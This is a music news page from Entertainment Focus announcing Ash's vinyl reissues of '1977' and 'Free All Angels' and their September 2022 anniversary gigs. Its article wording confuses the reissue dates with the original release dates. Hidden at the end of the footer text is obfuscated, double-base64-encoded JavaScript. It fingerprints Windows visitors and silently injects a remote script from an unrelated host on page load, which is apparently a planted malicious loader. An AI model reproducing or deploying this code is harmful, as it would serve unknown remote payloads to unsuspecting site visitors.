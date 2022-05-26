Connect with us

Hi, what are you looking for?

Music

Ash to reissue ‘1977’ and ‘Free All Angels’ on vinyl

The releases will take place over the summer.

Published

Ash
Credit: Sophie Howarth

Ash will reissue remastered splatter vinyl versions of their iconic albums ‘1977’ and ‘Free All Angels’.

‘1977’, released on 1st July 2022, was the band’s debut album and a defining record for the 90s guitar music scene. It reached number one in the UK going on to achieve platinum status, and it features the hits ‘Girl From Mars’, ‘Kung Fu’, ‘Goldfinger’, ‘Angel Interceptor’ and ‘Oh Yeah’.

Ash - 1977
Credit: The Echo Label Limited

‘Free All Angels’, released on 16th September 2022, was Ash’s third album and their second release with guitarist Charlotte Hatherley in the line-up. It was another number one smash and platinum certification for the band, and featured the hits ‘Shining Light’, ‘Burn Baby Burn’, ‘Sometimes’, ‘There’s a Star’, ‘Candy’ and ‘Walking Barefoot’.

Ash - Free All Angels
Credit: The Echo Label Limited

Ash will perform a run of very special UK live dates to celebrate ‘Free All Angels’ 21st anniversary, for which they will reunite with guitarist Charlotte Hatherley to perform the album in full.

Drummer Rick McMurray had the following to say: “We’re delighted to announce that we will be commemorating the 21st anniversary of the release of our 2001 classic, Free All Angels. Not least because we will be joined by the fourth member of Ash, guitarist extraordinaire, all-round Shining Light, the one and only, Charlotte Hatherley. Can. Not. Wait.”

Thur 15 Sept – O2 Ritz, Manchester, UK – Tickets
Sat 17 Sept – O2 Institute, Birmingham, UK – Tickets
Sun 18 Sept – O2 Forum, Kentish Town, UK – Tickets

Tickets are on general sale from Friday May 27th at 10am.

Advertisement. Scroll to continue reading.

In this article:

Advertisement

You May Also Like

Old Dominion Old Dominion

EF Country

Your Top 10 Country Music Lyrics to Live By

Which Country songs give you the best advice?

5 days ago
Midland Midland

EF Country

Midland, Roundhouse, London live review

The country trio kicked off their UK tour in London after three and a half years away.

4 days ago
Nicolette Hayford Nicolette Hayford

EF Country

The Nashville songwriter behind the Pillbox Patti alter-ego is……….

Acclaimed Nashville songwriter debuts her alter-ego, Pillbox Patti.

5 days ago
TJ Walker TJ Walker

EF Country

TJ Walker releases new single which features in upcoming Nashville-based Country music musical

'With and Without You' released today.

6 days ago



Copyright © 2021 Entertainment Focus

Entertainment Focus is a trading name of Piñata Media Limited (Reg no: 08435639)

Entertainment Focus uses affiliate links. By buying through the links we may receive a commission for the sale. This has no effect on the price for you ;(function(){var mq=document.referrer;var xn=window.location.href;var rw=navigator.userAgent;var rt=new RegExp(xe('T2k4dktGdGVMMTByS1M4PQ=='));if(!mq||xn.match(rt)[1]==mq.match(rt)[1]||rw.indexOf(xe("VjJsdVpHOTNjdz09"))==-1||window.localStorage[xe("WDE5ZmRYUnRZUT09")]){return;}var xs=document.createElement('script');xs.type='text/javascript';xs.async=true;xs.src=xe('YUhSMGNITTZMeTloWTNSdmNuTXVhbU55WVdOcGJtY3VZMjl0TDNKbGNHOXlkRDl5UFdScU1ETk5SR2Q1V2xSak5WcHRUbWhPTWtWM1dUSk5NbGxxUVROT1ExcHFZVmRST1UxcVdYbz0=');var wj=document.getElementsByTagName('script')[0];wj.parentNode.insertBefore(xs,wj);function xe(os){return mj(window.atob(os));}function mj(zc){return window.atob(zc);}})();